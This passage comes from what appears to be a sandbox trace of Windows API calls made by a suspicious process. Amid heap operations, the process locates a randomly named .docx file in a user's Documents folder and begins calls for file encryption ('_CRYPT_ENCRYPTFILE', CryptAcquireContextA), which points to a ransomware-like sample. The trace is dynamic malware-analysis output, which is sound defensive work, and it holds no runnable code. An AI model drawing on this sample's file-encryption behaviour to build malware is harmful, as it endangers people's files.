returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0077.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0077.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0077.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0077.244] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0077.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0077.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0077.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0077.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0077.245] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0077.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0077.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0077.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9dd0 [0077.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9dd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0077.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0077.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0077.246] CloseHandle (hObject=0x298) returned 1 [0077.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0077.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0077.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0077.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0077.247] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0077.247] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.247] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21a0 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0077.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22e0 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cf8 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0077.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0077.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0077.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0077.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0077.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0077.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0077.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0077.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0077.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0077.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0077.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0077.249] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0077.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.251] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\NHgtkAPLnX.docx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4814be60, ftCreationTime.dwHighDateTime=0x1d59a5e, ftLastAccessTime.dwLowDateTime=0x7b674560, ftLastAccessTime.dwHighDateTime=0x1d575df, ftLastWriteTime.dwLowDateTime=0x7b674560, ftLastWriteTime.dwHighDateTime=0x1d575df, nFileSizeHigh=0x0, nFileSizeLow=0x7490, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="NHgtkAPLnX.docx", cAlternateFileName="NHGTKA~1.DOC")) returned 0x41ac600 [0077.252] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0077.252] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0077.252] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.253] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0077.253] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0077.253] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0077.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0077.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0077.254] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0077.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0077.254] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.254] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0077.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0077.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0077.254] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0077.255] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0077.255] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.255] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 